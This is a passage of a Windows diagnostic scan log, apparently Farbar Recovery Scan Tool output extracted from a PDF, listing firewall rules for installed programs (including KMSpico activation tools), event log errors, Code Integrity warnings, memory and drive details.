FirewallRules: [UDP Query User{A3AD89B2-EF64-4B02-8C8D-76D6EA791ABC}C:\program f iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti fy\connectify.exe

FirewallRules: [TCP Query User{4EEFEEBC-829D-4AC5-A501-D7DD392F3F65}C:\program f iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti fy\connectify.exe

FirewallRules: [{26CBC116-A886-41F6-901D-44B8945880D9}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{A1865D0E-DFB8-4358-AC73-2FA0CB843CC6}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{49110ED6-5883-4612-874C-AB647A68DF25}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{ED159E10-39F8-4B76-A3B3-F971B8CAE1AB}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{F924F07A-D2A8-420C-9B88-11AD4B2C8370}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{2C6DE3EC-72A5-4457-8146-3389688D98CC}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{07D4D389-98EA-40A9-83BA-D730EC5C9630}] => (Allow) LPort=1688 FirewallRules: [{C109F93D-9100-431D-B61E-83C93D6E996A}] => (Allow) C:\Program Fi les\KMSpico\AutoPico.exe

(16)

les\KMSpico\AutoPico.exe

FirewallRules: [{81227772-2DAA-4A12-AF45-6FD4A355B49D}] => (Allow) C:\Program Fi les\KMSpico\Service_KMS.exe

FirewallRules: [{9BACA3F2-6A32-43D2-9A57-FE02F540F858}] => (Allow) C:\Program Fi les\KMSpico\Service_KMS.exe

FirewallRules: [{EF122BC9-8ED2-4F76-9A83-979E295D2594}] => (Allow) C:\Program Fi les\KMSpico\KMSELDI.exe

FirewallRules: [{BC44951D-BA85-4509-A961-CC23E6570D30}] => (Allow) C:\Program Fi les\KMSpico\KMSELDI.exe

FirewallRules: [{FB9C1AA6-B1DC-4FAF-823C-D769CA11ED7F}] => (Allow) LPort=1688 FirewallRules: [{EAB34039-D997-49A7-96B5-57F98CCD1402}] => (Allow) C:\Program Fi les (x86)\HP\hp software update\hpwucli.exe

FirewallRules: [{CAA82361-BF4D-4259-A3DF-830A363F74C4}] => (Allow) C:\Program Fi les (x86)\HP\Digital Imaging\bin\hpiscnapp.exe

FirewallRules: [{50EE1F7B-EEDB-46A0-99F8-FEA2C0BD925D}] => (Allow) C:\Program Fi les (x86)\HP\Digital Imaging\bin\hpfccopy.exe

FirewallRules: [{29B0DB79-257F-40D0-AA83-C1AD16D8ADD7}] => (Allow) C:\Program Fi les (x86)\HP\Digital Imaging\bin\hpqkygrp.exe

FirewallRules: [{52D27317-8D42-43FF-A895-4BB64E868B1E}] => (Allow) LPort=3306 FirewallRules: [{3CF0ED6F-3D1A-4F51-9E5E-4C2BD0B5C806}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{7C4E8E3C-1BB7-4E4C-AE79-DF4AC5C9B8D4}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{B631FD5E-2E77-4114-A834-AAEDAE48BAF6}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{D063D9A9-8BBB-481E-933B-CD7F0967A396}] => (Allow) C:\Program Fi les (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{07E6D6A7-E7EF-4A4F-91A2-25057ED1E21F}] => (Allow) C:\Program Fi les (x86)\Intel\IntelAppStore\bin\ismagent.exe

FirewallRules: [{21B98EFC-048E-4BE2-BC33-0890B808A00D}] => (Allow) C:\Program Fi les (x86)\Spotify\spotify.exe

FirewallRules: [{74E32F51-08BF-496A-A141-2D2EAF121968}] => (Allow) C:\Program Fi les (x86)\Spotify\spotify.exe

FirewallRules: [{ED275BE1-9260-49CD-8405-134CE78CD8F7}] => (Allow) C:\Program Fi les (x86)\Spotify\Data\SpotifyWebHelper.exe

FirewallRules: [{D288FF71-31C1-4DF5-AFC5-175747EFA260}] => (Allow) C:\Program Fi les (x86)\Spotify\Data\SpotifyWebHelper.exe

FirewallRules: [{69B5AC7F-E405-4421-A111-09A6F9EEDD62}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe

FirewallRules: [{E6B96284-A2D9-4F0E-9CA7-813B79BC8EF0}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe

FirewallRules: [{8C677F5F-8553-429E-8E5E-7271B10687B7}] => (Allow) C:\Program Fi les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe

FirewallRules: [{574FD494-3CA7-4021-8A39-F14DA44AFC16}] => (Allow) C:\Program Fi les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe

FirewallRules: [{CD0B6F4B-0009-4EBC-A245-C5562ACE4FB4}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{C3C2D29B-B322-4EB2-B525-2F1273B1F716}] => (Allow) C:\Program Fi les (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{E9B53418-4574-45A0-8639-DC0D6707F655}] => (Allow) C:\Users\REVE RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe

FirewallRules: [{F570D4F2-1C74-46C1-BCF1-1120781D9D59}] => (Allow) C:\Users\REVE RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe

FirewallRules: [{9B9610DF-DAF7-4650-B8EB-BE4B5CAAE391}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\stats.com

FirewallRules: [{705BE377-AD8B-4F94-90AB-D2EFCB6644B4}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe

FirewallRules: [{02C0309B-F069-4FF4-9696-6487D878C8CE}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\stats.exe

(17)

les (x86)\IBM\SPSS\Statistics\20\stats.com

FirewallRules: [{1283C0F1-9220-4572-9FA4-B585067FC7F4}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe

FirewallRules: [{3696728A-EA99-464F-A76A-C4298E33CD6A}] => (Allow) C:\Program Fi les (x86)\IBM\SPSS\Statistics\20\stats.exe

FirewallRules: [{DC0F0CEB-84AC-4464-8BA3-4402EB74A9D6}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe

FirewallRules: [{E5709ADD-BFFA-4A8C-A9B5-7E15E0582DC9}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe

FirewallRules: [{DF2B8723-CEC4-4121-B6DB-19FDA93A6270}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe

FirewallRules: [{BAB82F17-DE9D-4248-A0CB-8B5879ADB4D5}] => (Allow) C:\Program Fi les (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{54ABF091-1DF9-4B69-B37B-C41E73C69CB6}] => (Allow) LPort=2869 FirewallRules: [{862B93C9-B9A9-48FA-ADA3-55F921FF41A4}] => (Allow) LPort=1900 FirewallRules: [{6F700F9F-D2C2-468C-B86E-5CA39E1D4741}] => (Allow) C:\Program Fi les (x86)\Windows Live\Messenger\msnmsgr.exe

FirewallRules: [{5D10C7CA-B991-4391-B4D4-5C8BB7A03570}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe

FirewallRules: [{87A90989-487D-4828-AA46-7A469FF67E99}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe

FirewallRules: [{A33D9D2D-3F09-4532-BFCF-3F5E7EB512D8}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe

FirewallRules: [{AB39E013-B069-4E52-9BE2-E0FFDB0DFFEB}] => (Allow) C:\Users\REVE RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe

FirewallRules: [{59651CC9-DAE1-45A7-B149-D8FC70DCE492}] => (Allow) C:\Program Fi les (x86)\Skype\Phone\Skype.exe

FirewallRules: [TCP Query User{FEC06A52-37E7-4021-ACBD-CD78C3D93BDB}C:\users\rev erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata \roaming\vseeinstall\vsee.exe

FirewallRules: [UDP Query User{45B734E6-71F3-4293-868A-6B2043316142}C:\users\rev erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata \roaming\vseeinstall\vsee.exe

FirewallRules: [{80B7C41D-AE8A-4702-8BB8-17C136318964}] => (Block) C:\users\reve rien\appdata\roaming\vseeinstall\vsee.exe

FirewallRules: [{EDC8A610-4B6C-4F1E-BD72-B18609B14D31}] => (Block) C:\users\reve rien\appdata\roaming\vseeinstall\vsee.exe

FirewallRules: [TCP Query User{9CE82D32-5C0E-4E17-8B6D-E4944A71551B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [UDP Query User{E86DBDF3-5870-46CB-B2C1-7B01B124FD8B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [TCP Query User{4064EA95-343A-4444-AA16-7E87ABDFCDA6}C:\program f iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i bm\spss\statistics\20\stats.exe

FirewallRules: [UDP Query User{47DFAE74-EBA1-4001-8308-3316B9D1FC26}C:\program f iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i bm\spss\statistics\20\stats.exe

FirewallRules: [TCP Query User{C0110B3C-2BCF-4E80-AEF4-74B2F19B9830}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [UDP Query User{7C67A3A5-4C70-435B-A43A-897049E4F23B}C:\program f iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [TCP Query User{1C739540-6B6E-4658-85DE-AE84B2115A96}C:\program f iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60 \bin\java.exe

FirewallRules: [UDP Query User{625CADCA-9AD2-4D93-9946-9935A73F3C1A}C:\program f iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60

(18)

\bin\java.exe

FirewallRules: [{9BE26317-4C02-4241-92DB-A8A1FC476E35}] => (Allow) C:\Program Fi les\KMSnano\qemu-system-i386.exe

FirewallRules: [{0185FCB4-F83E-476C-8C83-7E96F997E750}] => (Allow) C:\Program Fi les\KMSnano\qemu-system-i386.exe

FirewallRules: [{A94D9EED-B06D-40EF-BC22-696A748AA005}] => (Allow) c:\program fi les (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe

FirewallRules: [TCP Query User{C5F57E73-72B0-41B8-BC44-8684B97CC4DA}C:\program f iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex e

FirewallRules: [UDP Query User{739CCF3C-E344-4A02-9C2E-E15BE58C0F42}C:\program f iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex e

FirewallRules: [TCP Query User{23EA3972-718B-4DC8-8F47-383CBD730E9E}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe

FirewallRules: [UDP Query User{F0C8441B-10DA-43D0-ADD9-E489B359C9CC}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe

FirewallRules: [{F653B5D8-9AAC-4521-9B17-DFB7DC379077}] => (Allow) C:\Program Fi les\Bonjour\mDNSResponder.exe

FirewallRules: [{88671DA2-CC5A-49CB-A0C9-48B72A220E78}] => (Allow) C:\Program Fi les\Bonjour\mDNSResponder.exe

FirewallRules: [{91A5D443-9D77-4A0B-8E80-B5D3392DD370}] => (Allow) C:\Program Fi les (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{87EF9B94-EE96-466E-BD82-8CE5117E7A10}] => (Allow) C:\Program Fi les (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [TCP Query User{70B2A856-2AF0-424D-8629-2DB1B396EC82}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe

FirewallRules: [UDP Query User{10211271-2BDC-42C2-B961-8DB4582E4C2F}C:\program f iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\ vlc.exe

==================== Restore Points ========================= ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices ============= Name:

Description: Class Guid: Manufacturer: Service:

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: ========================= Application errors:

==================

Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: 788: ERROR: read_msg errno 0 (The operation completed successfully. )

(19)

)

Description: ERROR: mDNSPlatformReadTCP - recv: 10053

Description: 1016: ERROR: read_msg errno 0 (The operation completed successfully .)

System errors: =============

Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031 ) (User: )

Description: The User Data Access_560cb16 service terminated unexpectedly. It ha s done this 1 time(s). The following corrective action will be taken in 10000 mi lliseconds: Restart the service.

Description: The User Data Storage_560cb16 service terminated unexpectedly. It h as done this 1 time(s). The following corrective action will be taken in 10000 m illiseconds: Restart the service.

Description: The Contact Data_560cb16 service terminated unexpectedly. It has do ne this 1 time(s). The following corrective action will be taken in 10000 millis econds: Restart the service.

(20)

Description: The Sync Host_560cb16 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseco nds: Restart the service.

Error: (04/06/2016 09:27:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY)

Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5 20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/05/2016 08:58:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY)

Error: (04/05/2016 05:02:15 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR ITY)

Error: (04/05/2016 03:08:37 PM) (Source: bowser) (EventID: 8003) (User: )

Description: The master browser has received a server announcement from the comp uter ACER

that believes that it is the master browser for the domain on transport NetBT_Tc pip_{D3A7E1A2-BF66-4FA4-B421-289C91B29B3B}.

The master browser is stopping or an election is being forced.

Error: (04/05/2016 02:40:17 PM) (Source: bowser) (EventID: 8003) (User: )

Description: The master browser has received a server announcement from the comp uter LENOVO

that believes that it is the master browser for the domain on transport NetBT_Tc pip_{C7344E23-A6A5-4EEE-9867-288EC4D5B277}.

The master browser is stopping or an election is being forced.

Error: (04/05/2016 01:02:47 PM) (Source: Service Control Manager) (EventID: 7031 ) (User: )

Description: The UpdateSvc service terminated unexpectedly. It has done this 2 t ime(s). The following corrective action will be taken in 60000 milliseconds: Res tart the service.

CodeIntegrity:

=================================== Date: 2016-04-06 09:07:15.285

Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-04-06 09:07:15.243

(21)

Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di d not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-04-04 12:03:02.209

Date: 2016-04-04 12:03:02.171

Date: 2016-04-02 20:08:57.152

Date: 2016-03-30 14:43:23.764

Description: Code Integrity is unable to verify the image integrity of the fil e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag e image hashes could not be found on the system.

Date: 2016-03-30 14:29:38.240

Date: 2016-03-30 13:46:03.397

Date: 2016-03-30 13:37:25.565

==================== Memory info =========================== Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz

Percentage of memory in use: 53% Total physical RAM: 6027.22 MB Available physical RAM: 2815.9 MB Total Virtual: 8587.22 MB

Available Virtual: 4472.3 MB

==================== Drives ================================

Drive c: (TI31061100A) (Fixed) (Total:119.2 GB) (Free:20.51 GB) NTFS Drive e: () (Fixed) (Total:166.29 GB) (Free:10.71 GB) NTFS

(22)

==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 298.1 GB) (Disk ID: 00000000)

Partition: GPT.

======================================================== Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)

Partition: GPT.